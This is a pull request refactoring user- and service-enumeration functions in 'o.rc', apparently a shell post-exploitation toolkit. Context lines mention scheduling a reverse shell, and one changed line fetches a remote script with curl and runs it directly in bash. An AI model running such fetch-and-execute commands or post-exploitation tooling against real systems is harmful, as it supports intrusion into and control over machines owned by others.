### PR TITLE
getusers and getuservices optimization

### DIFF
--- a/o.rc
+++ b/o.rc
@@ -119,14 +119,25 @@ timedshell() {
 echo "scheduling a reverse shell to launch later..."
 }
 
+listusers() {
+  # Listing users in passwd with login shells.
+  # Reject shells named *nologin or *false as valid shells.
+  getent passwd |
+  awk -F ':' '
+     NF==1 && $1 !~ /^#|nologin$|false$/ {shells[$1]=1}
+     $7 in shells {print $1}' /etc/shells -
+}
+
 getusers() {
-echo "Listing valid users with shells."
-getent passwd | grep -f /etc/shells | grep -v "nologin\|false" | cut -d: -f1
+  echo "Listing valid users with shells."
+  listusers
 }
 
 getuservices() {
-echo "Listing all service processes with accounts in passwd."
-ps --no-header -weFH | grep -v $(getent passwd | grep -f /etc/shells | grep -v nologin | grep -v false | awk -F":" '{print $1}' | tr '\n' '|' | sed s'/|/\\\|/g'  | sed s'/..$//')
+  echo "Listing all running services with non-user accounts in passwd."
+  { listusers; ps --no-header -weFH; } |
+  awk 'NF==1 {users[$1]=1}
+       NF>1 && !($1 in users) {print}'
 }
 
 getidle() {

--- a/o.rc
+++ b/o.rc
@@ -187,7 +187,7 @@ fi
 getsuspect() {
 #ask and ye shall receive
 #this janky, awful shortcut
-sh <(curl https://raw.githubusercontent.com/zMarch/suspect/master/suspect.sh) 
+bash <(curl https://raw.githubusercontent.com/zMarch/suspect/master/suspect.sh) 
 }
 
 keyinstall() {


### PR DESCRIPTION
Minor bug fix:
- The getusers function never lists a user like 'falser' (A real name, you can find persons with this name) because the grep filters 'false' in the whole passwd line. The new awk based function filters only the shell names.

Optimization:
- The common code part in getusers and getuservice functions were moved into a new listusers function.
- The very long pipe in the getuservice function with grep, awk and sed was replaced by a short awk code. I hope this code is easier to read and maintain.

The new code was checked with awk, awk --posix and mawk on Ubuntu 10.04LTS and on Debian 9.
